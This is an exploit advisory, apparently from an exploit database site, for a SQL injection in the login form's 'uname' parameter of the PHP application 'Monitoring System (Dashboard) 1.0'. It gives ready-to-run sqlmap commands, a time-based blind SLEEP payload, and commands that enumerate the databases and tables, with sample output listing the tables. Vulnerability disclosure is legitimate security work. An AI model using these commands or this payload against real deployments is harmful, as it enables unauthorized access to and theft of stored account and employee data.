Monitoring System (Dashboard) 1.0 SQL Injection

2021.03.13
Credit: Richard Jones
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Monitoring System (Dashboard) | SQL Injection (uname) parameter # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html # Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 Steps. 1. Run sqlmap "sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch 2. Parameter: uname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin= Exploit paths: Database: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs Tables: sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables [11 tables] +------------+ | accounts | | attendance | | contacts | | employee | | gallery | | msexcel | | msppt | | msword | | oic | | random | | sign | +------------+


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top